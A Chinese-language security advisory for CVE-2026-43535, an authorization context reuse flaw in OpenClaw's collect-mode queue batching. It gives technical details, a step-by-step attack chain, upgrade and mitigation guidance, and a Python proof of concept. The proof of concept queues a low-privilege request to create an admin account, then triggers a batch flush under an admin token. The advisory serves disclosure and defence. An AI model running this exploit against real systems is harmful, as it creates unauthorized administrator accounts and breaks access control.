CVE-2026-43535 OpenClaw授权上下文重用漏洞

漏洞信息

漏洞编号

CVE-2026-43535

漏洞类型

权限提升

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.14之前的版本存在授权上下文重用漏洞。在收集模式队列批次处理机制中，系统错误地允许不同发送者的消息继承最终发送者的授权上下文。攻击者可利用此缺陷，通过发送多个排队消息，诱导系统利用高权限用户的上下文来排空批次，致使先前提交的低权限消息以提升后的权限执行，破坏系统访问控制。

技术细节

该漏洞源于OpenClaw在处理collect-mode（收集模式）下的队列批次时，未能正确隔离消息发送者的授权上下文。系统在批处理过程中存在逻辑缺陷，导致后续发送者的权限上下文被错误地共享给批次中的所有消息。具体而言，当多个消息进入队列等待批次处理时，如果最后一个发送者具有较高权限（如管理员），系统在执行该批次时，会将此高权限上下文应用于该批次中的所有消息，包括之前由低权限用户发送的消息。攻击者无需用户交互，只需具备低权限账号，即可构造特定的序列化请求。通过精心安排请求时序，将恶意操作消息夹在高权限用户的操作批次中，从而实现提权操作，造成机密性泄露和完整性破坏。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行的是OpenClaw 2026.4.14之前的版本，且启用了collect-mode功能。

STEP 2

2. 获取低权限账号

攻击者注册或获取一个普通低权限用户账号的访问令牌。

STEP 3

3. 构造恶意消息

攻击者向系统队列发送包含恶意操作（如提权、数据窃取）的消息，该消息因批次处理机制暂未执行。

STEP 4

4. 诱导批次处理

攻击者等待或诱导高权限用户（如管理员）进行操作，使高权限用户的请求进入同一批次并触发批次的排空与执行。

STEP 5

5. 权限提升执行

由于漏洞存在，系统错误地使用高权限用户的上下文执行了整个批次，导致攻击者的恶意消息以高权限执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-43535: OpenClaw Authorization Context Reuse.
This script demonstrates how a low-privileged user can trigger
a batch execution that inherits a high-privileged user's context.
"""

import requests
import time

TARGET_URL = "http://target-openclaw-instance/api/queue"
LOW_PRIV_TOKEN = "low_priv_user_token"
HIGH_PRIV_TOKEN = "admin_token" # Assumed to be active via parallel activity

# Step 1: Low-priv user sends a malicious command (e.g., create admin)
# This message sits in the queue waiting for batch processing.
malicious_payload = {
    "action": "create_user",
    "role": "admin",
    "username": "attacker_admin"
}

print("[*] Sending malicious message with low privileges...")
requests.post(TARGET_URL, json=malicious_payload, headers={"Authorization": LOW_PRIV_TOKEN})

# Step 2: Wait a brief moment to ensure the message is queued in the current batch
time.sleep(0.5)

# Step 3: Trigger batch flush.
# In a real scenario, this happens when a high-priv user sends a request.
# The vulnerability causes the entire batch (including our message) to run
# with the high-priv user's context.
trigger_payload = {
    "action": "status_check"
}

print("[*] Triggering batch execution context switch...")
# Simulating the high-priv request that drains the batch
requests.post(TARGET_URL, json=trigger_payload, headers={"Authorization": HIGH_PRIV_TOKEN})

print("[+] Exploit completed. Check if 'attacker_admin' was created.")

影响范围

OpenClaw < 2026.4.14

防御指南

临时缓解措施

建议立即升级至OpenClaw 2026.4.14或更高版本以修复该逻辑缺陷。若无法立即升级，应暂时禁用collect-mode功能或严格限制消息队列的并发处理，确保不同用户的请求上下文严格隔离。